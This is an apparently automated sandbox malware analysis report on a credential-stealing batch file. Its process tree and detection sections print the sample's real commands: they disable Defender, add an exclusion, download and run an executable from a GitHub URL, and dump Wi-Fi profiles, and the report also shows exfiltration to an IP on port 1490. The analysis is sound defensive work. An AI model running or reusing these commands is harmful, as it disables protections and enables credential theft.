Edit tour

Windows Analysis Report
3gJQoqWpxb.bat

Overview

General Information

Sample name:	3gJQoqWpxb.bat
Analysis ID:	1576243
MD5:	3642e29400aac4137d7da517c1a0161b
SHA1:	b538bfc1dc9903ff5766000219cd91f3cf978299
SHA256:	d5033dd57b3a239c426396ffd361a81ad4e37848cb05ff5ac47f3e73555a0a56
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Adds a directory exclusion to Windows Defender

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

PE file contains section with special chars

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64native

cmd.exe (PID: 8788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cacls.exe (PID: 8996 cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" MD5: A353590E06C976809F14906746109758)

powershell.exe (PID: 8980 cmdline: powershell -window hidden -command "" MD5: 04029E121A0CFA5991749937DD22A1D9)

reg.exe (PID: 6076 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 5364 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 2208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 2512 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 2288 cmdline: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth" MD5: 227F63E1D9008B36BDBCC4B397780BE4)

takeown.exe (PID: 2280 cmdline: takeown /f "C:\Windows\System32\SecurityHealthService.exe" MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 1936 cmdline: icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c MD5: 48C87E3B3003A2413D6399EA77707F5D)

takeown.exe (PID: 812 cmdline: takeown /f "C:\Windows\System32\SecurityHealthSystray.exe" MD5: D258A76AA885CBBCAE8C720CD1C284A5)

icacls.exe (PID: 1856 cmdline: icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c MD5: 48C87E3B3003A2413D6399EA77707F5D)

taskkill.exe (PID: 1568 cmdline: taskkill /IM SecurityHealthSystray.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

powershell.exe (PID: 2100 cmdline: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 9000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

timeout.exe (PID: 9056 cmdline: timeout.exe /t 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)

attrib.exe (PID: 1564 cmdline: attrib +h "QQQ" /s /d MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

powershell.exe (PID: 712 cmdline: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

NVIDIAS.exe (PID: 716 cmdline: NVIDIAS.exe MD5: 2FE8C93D75210E538AEC9062BA29C645)

cmd.exe (PID: 5036 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

tasklist.exe (PID: 6480 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

cmd.exe (PID: 6904 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716 MD5: 40A149513D721F096DDF50C04DA2F01F)

chcp.com (PID: 8976 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

netsh.exe (PID: 2836 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7444 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6072 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 5548 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

taskkill.exe (PID: 2448 cmdline: TaskKill /F /IM 716 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7360 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 1300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320 MD5: 40A149513D721F096DDF50C04DA2F01F)

attrib.exe (PID: 6520 cmdline: attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

svchost.exe (PID: 8800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
3gJQoqWpxb.bat	INDICATOR_SUSPICIOUS_EXE_UACBypass_fodhelper	detects Windows exceutables potentially bypassing UAC using fodhelper.exe	ditekSHen	0x149:$s1: \SOFTWARE\Classes\ms-settings\shell\open\command 0x233:$s1: \software\classes\ms-settings\shell\open\command 0x268:$s2: DelegateExecute 0x28c:$s3: fodhelper 0x1f2:$s4: ConsentPromptBehaviorAdmin

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: NVIDIAS.exe PID: 716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ, ProcessId: 2100, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 712, TargetFilename: C:\ProgramData\QQQ\NVIDIAS.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", ProcessId: 712, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'", ProcessId: 712, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -window hidden -command "", CommandLine: powershell -window hidden -command "", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8788, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -window hidden -command "", ProcessId: 8980, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 908, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8800, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: NVIDIAS.exe, ParentImage: C:\ProgramData\QQQ\NVIDIAS.exe, ParentProcessId: 716, ParentProcessName: NVIDIAS.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 6904, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T17:30:28.130597+0100	2843856	1	A Network Trojan was detected	192.168.11.20	49710	89.23.100.233	1490	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Avira: detection malicious, Label: HEUR/AGEN.1309950

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\QQQ\NVIDIAS.exe

ReversingLabs: Detection: 70%

Machine Learning detection for dropped file

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.11.20:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.11.20:49708 version: TLS 1.2

Source:	Binary string: ntkrnlmp.pdbxC4 source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbtmpx87^ source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbndows PowerShell.lnk source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Security.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: ntkrnlmp.pdbmb;~f source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.IO.Compression.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Configuration.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: winload_prod.pdb source: NVIDIAS.exe, 00000015.00000002.1218454425.00000000069E9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.pdb source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb/ source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\tdataac4 source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: NVIDIAS.exe, 00000015.00000002.1225165858.0000000070E1B000.00000020.00000001.01000000.00000008.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Drawing.pdb source: NVIDIAS.exe, 00000015.00000002.1234568805.0000000070FFB000.00000020.00000001.01000000.00000007.sdmp, WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Management.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ws\ source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.pdbH source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\** source: NVIDIAS.exe, 00000015.00000002.1216769501.0000000005D04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Security.pdb24 source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*a source: NVIDIAS.exe, 00000015.00000002.1220147777.000000000794B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\*ae source: NVIDIAS.exe, 00000015.00000002.1220147777.00000000079AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: mscorlib.pdbH source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.ni.pdb source: WER6A29.tmp.dmp.39.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6A29.tmp.dmp.39.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49710 -> 89.23.100.233:1490

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 1490
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49710

Source: global traffic

TCP traffic: 192.168.11.20:49710 -> 89.23.100.233:1490

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960"Host: 89.23.100.233:1490Content-Length: 119581Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 140.82.113.4 140.82.113.4
Source: Joe Sandbox View	IP Address: 89.23.100.233 89.23.100.233
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241

Source: Joe Sandbox View

ASN Name: MAXITEL-ASRU MAXITEL-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: global traffic	HTTP traffic detected: GET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: raw.githubusercontent.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233

Source: global traffic	HTTP traffic detected: GET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 247.106.0.0.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960"Host: 89.23.100.233:1490Content-Length: 119581Expect: 100-continueConnection: Keep-Alive

Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1490
